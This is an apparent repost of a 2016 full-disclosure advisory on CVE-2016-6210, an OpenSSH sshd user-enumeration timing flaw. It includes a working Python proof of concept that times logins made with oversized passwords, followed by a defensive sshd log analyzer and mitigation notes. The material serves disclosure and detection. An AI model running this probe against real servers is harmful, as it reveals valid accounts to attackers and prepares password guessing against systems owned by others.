OpenSSHD <= 7.2p2 - User Enumeration
Source: vfocus.net  Author: Harari  Published: 2016-07-19
Source: http://seclists.org/fulldisclosure/2016/Jul/51
 
--------------------------------------------------------------------
User enumeration using OpenSSH sshd (<= latest version at the time of writing).
-------------------------------------------------------------------
 
Abstract:
-----------
By sending large passwords, a remote user can enumerate users on a system that runs sshd. The problem exists in most
modern configurations because computing a SHA256/SHA512 hash takes much longer than computing a BLOWFISH hash.
 
CVE-ID
---------
CVE-2016-6210
 
Tested versions
--------------------
This issue was tested on opensshd-7.2p2 (it should also be present in most earlier versions).
 
Fix
-----------------
This issue was reported to the OpenSSH developer group and they have sent a patch (I don't know whether the patch has been released yet).
(Thanks to 'dtucker () zip com au' for his quick reply and fix suggestion.)
 
Details
----------------
When sshd tries to authenticate a non-existent user, it falls back to a fake password structure hard-coded in the sshd
source. The password hash in that hard-coded structure is a BLOWFISH ($2) hash.
If real users' passwords are hashed with SHA256/SHA512, then sending large passwords (10KB) results in a shorter
response time from the server for non-existent users than for existing ones.
 
Sample code:
----------------
import paramiko
import time

user = input("user: ")
p = 'A' * 25000  # oversized password: makes the server-side hash computation measurable

ssh = paramiko.SSHClient()
ssh.set_missing_host_key_policy(paramiko.AutoAddPolicy())

starttime = time.perf_counter()
try:
    ssh.connect('127.0.0.1', username=user, password=p)
except Exception:
    pass  # authentication failure is the expected outcome
# stop the clock whether the login failed or (unexpectedly) succeeded
endtime = time.perf_counter()
total = endtime - starttime
print(total)
 
(Valid users will result in a higher total time.)
 
*** Please note that if the sshd configuration prohibits root login, then root is not considered a valid user.
 
*** When the TCP timestamp option is enabled, the best way to measure the time is to use the timestamps from the server's
TCP packets, since this eliminates any network delays along the way.
 
Eddie Harari
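From the defender's side, the probe above leaves a distinctive trace in the sshd log: one password failure per user name, many different names from the same source, with sshd itself tagging the non-existent ones as "invalid user". Because each name is tried only once, per-user retry thresholds (the brute-force pattern) do not fire; counting distinct user names per source does. The following analyzer is an added example, not part of the advisory or of OpenSSH; the log lines are constructed, and the window and threshold values are assumptions to tune per environment.

```python
import re
from collections import defaultdict
from datetime import datetime, timedelta

# Constructed sample of sshd syslog lines (not real traffic). Source
# 198.51.100.7 probes six different user names, one attempt each, which is the
# pattern a timing-based enumeration produces; 203.0.113.5 is a legitimate
# user mistyping a password twice before logging in.
SAMPLE_LOG = """\
Jul 19 10:00:01 host sshd[1201]: Failed password for invalid user admin from 198.51.100.7 port 40001 ssh2
Jul 19 10:00:02 host sshd[1202]: Failed password for invalid user test from 198.51.100.7 port 40002 ssh2
Jul 19 10:00:03 host sshd[1203]: Failed password for root from 198.51.100.7 port 40003 ssh2
Jul 19 10:00:04 host sshd[1204]: Failed password for invalid user oracle from 198.51.100.7 port 40004 ssh2
Jul 19 10:00:05 host sshd[1205]: Failed password for alice from 198.51.100.7 port 40005 ssh2
Jul 19 10:00:06 host sshd[1206]: Failed password for invalid user git from 198.51.100.7 port 40006 ssh2
Jul 19 10:00:10 host sshd[1207]: Failed password for alice from 203.0.113.5 port 50000 ssh2
Jul 19 10:00:14 host sshd[1208]: Failed password for alice from 203.0.113.5 port 50001 ssh2
Jul 19 10:00:20 host sshd[1209]: Accepted password for alice from 203.0.113.5 port 50002 ssh2
"""

# Matches the standard sshd "Failed password" line; the optional
# "invalid user " marker is how sshd reports a name with no account.
FAILED_RE = re.compile(
    r"^(?P<ts>\w{3} +\d{1,2} \d{2}:\d{2}:\d{2}) \S+ sshd\[\d+\]: "
    r"Failed password for (?P<invalid>invalid user )?(?P<user>\S+) "
    r"from (?P<src>\S+) port \d+"
)


def parse_failed_logins(log_text):
    """Return a list of (timestamp, src_ip, username, is_invalid_user)."""
    events = []
    for line in log_text.splitlines():
        m = FAILED_RE.match(line)
        if not m:
            continue
        # syslog timestamps carry no year; fine for computing time deltas
        ts = datetime.strptime(m.group("ts"), "%b %d %H:%M:%S")
        events.append((ts, m.group("src"), m.group("user"), m.group("invalid") is not None))
    return events


def find_enumeration_sources(events, window_seconds=60, min_distinct_users=4):
    """Flag sources that tried at least `min_distinct_users` different user
    names within any `window_seconds` span (assumed thresholds)."""
    by_src = defaultdict(list)
    for ts, src, user, invalid in events:
        by_src[src].append((ts, user, invalid))
    window = timedelta(seconds=window_seconds)
    findings = {}
    for src, evs in by_src.items():
        evs.sort()
        best = 0
        j = 0
        for i in range(len(evs)):
            # slide j to the first event that falls outside the window opened at i
            while j < len(evs) and evs[j][0] - evs[i][0] <= window:
                j += 1
            best = max(best, len({u for _, u, _ in evs[i:j]}))
        if best >= min_distinct_users:
            findings[src] = {
                "distinct_users": best,
                "attempts": len(evs),
                # names sshd rejected as non-existent vs. names that are real accounts
                "invalid_users": sorted({u for _, u, inv in evs if inv}),
                "existing_users": sorted({u for _, u, inv in evs if not inv}),
            }
    return findings


if __name__ == "__main__":
    for src, info in find_enumeration_sources(parse_failed_logins(SAMPLE_LOG)).items():
        print(src, info)
```

Splitting the flagged names into "invalid_users" and "existing_users" shows exactly what the prober learned, which is the list worth reviewing after an incident. Since the hash computation that creates the timing difference only runs for password authentication, hosts that can accept key-only logins close the code path entirely with `PasswordAuthentication no`; where passwords must stay enabled, this distinct-names-per-source check is the signal to alert on.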
 